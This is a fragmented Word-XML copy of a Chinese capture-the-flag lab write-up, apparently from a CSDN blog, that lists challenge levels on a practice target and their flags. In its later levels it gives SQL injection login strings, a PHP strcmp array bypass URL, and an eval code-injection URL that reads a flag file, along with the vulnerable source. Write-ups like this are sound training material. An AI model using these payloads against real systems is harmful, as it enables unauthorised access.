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靶机ip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68595" cy="39541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扫描主机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68595" cy="4284345"/>
            <wp:effectExtent l="0" t="0" r="444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查看靶机所开的端口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113020" cy="22631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浏览器登录192.168.0.104/web/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第一关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68595" cy="492823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1677670" cy="652780"/>
            <wp:effectExtent l="0" t="0" r="139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第二关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3675" cy="1962150"/>
            <wp:effectExtent l="0" t="0" r="146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第三关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1770" cy="2160270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第四关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1135" cy="2668270"/>
            <wp:effectExtent l="0" t="0" r="190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第五关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69230" cy="287337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第六关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0500" cy="2717800"/>
            <wp:effectExtent l="0" t="0" r="254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第七关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3675" cy="2427605"/>
            <wp:effectExtent l="0" t="0" r="1460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第八关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69865" cy="1871345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第九关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</w:rPr>
        <w:t>flag{This is a simple file upload vulnerability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1135" cy="1933575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  <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>第十关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</w:rPr>
        <w:t>flag{you are very g00d}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68595" cy="3726815"/>
            <wp:effectExtent l="0" t="0" r="444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  <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>第十一关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</w:rPr>
        <w:t>flag{QR_C0d3_I5_Fin3?} 更新flag flag{uywiufhwuhiwefhwi}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3675" cy="2470150"/>
            <wp:effectExtent l="0" t="0" r="1460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第十二关：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4"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>flag{zhe_IS_fla9_fight1ng}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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271770" cy="3602355"/>
            <wp:effectExtent l="0" t="0" r="127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用户名：1' or 1#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密码：随便输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验证码：看图片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第十四关 login2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用户名：1\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密码：or 1;#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验证码：看图片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第十五关 php若类型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num：1a</w:t>
      </w:r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flag{suc_c_ess}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第十六关 函数缺陷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构造URL http://192.168.1.123/web/php/strcmp.php?password[]=1&amp;Submit=提交#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flag{n_Ic_e}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最后一关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构造URL：http://192.168.1.123/web/include/include2.php?hello=1);print_r(file("./flag.php")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int(1) Array ( [0] =&gt; [1] =&gt; $flag = '成功'; [3] =&gt; #echo $flag; [4] =&gt; #flag{you are 666}; [5] =&gt; ?&gt; ) &lt;?php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include "flag.php";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$a = $_REQUEST['hello'];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eval( "var_dump($a);");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show_source(__FILE__);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---------------------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作者：k0sec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来源：CSDN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 xml:space="preserve">原文：https://blog.csdn.net/ghx13630444675/article/details/93888576 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版权声明：本文为博主原创文章，转载请附上博文链接！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71152C"/>
    <w:rsid w:val="6871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2019-07-04T02:30:00Z</dcterms:created>
  <dc:creator>loser丶微笑</dc:creator>
  <cp:lastModifiedBy>loser丶微笑</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-07-04T03:46:44Z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